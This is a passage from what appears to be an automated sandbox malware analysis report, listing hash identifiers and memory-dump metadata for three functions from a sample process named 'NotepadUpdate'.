                                  • Opcode ID: 754dd427bc5186ad63de137c263518140c03cd461d830013786f34aa0ad18aee
                                  • Instruction ID: 056ec9e7d85ef359c3eab6bf0b9597173dbaef5c1a3968dcea2b5ce9601537bf
                                  • Opcode Fuzzy Hash: 754dd427bc5186ad63de137c263518140c03cd461d830013786f34aa0ad18aee
                                  • Instruction Fuzzy Hash: ACF0E53111B384AFCF129BB1EC089977F69EB46354F044076F904C7012E7768118C6B2
                                  Function 092D11A7 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 791fd924caf23536b3884d70a11eb44991d6058064c11241f57aa2af14c465f8
                                  • Instruction ID: 1c9d0ac5d489356c3ecebc3cc7724a827fb5ec0a132591a13506ea984586fc53
                                  • Opcode Fuzzy Hash: 791fd924caf23536b3884d70a11eb44991d6058064c11241f57aa2af14c465f8
                                  • Instruction Fuzzy Hash: 1BF0E578506349AFC715DFB5E900A99BBF9EB02210F2001DAE8059B252DA310F54DBA1
                                  Function 092D11B8 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 794d33d8485f06759b4bf6951bd892bc23fc0fb8e313b19688df442048b5d10a
                                  • Instruction ID: 96f2fffee563dcb0dbe6a11596844b688728c68d21efc8c7364273e4ff29ead6
                                  • Opcode Fuzzy Hash: 794d33d8485f06759b4bf6951bd892bc23fc0fb8e313b19688df442048b5d10a
                                  • Instruction Fuzzy Hash: CEE08C70A01209EFC758EFB9E644A9DBBFAEB45310F6045A9D405AB220EB705E40DBA1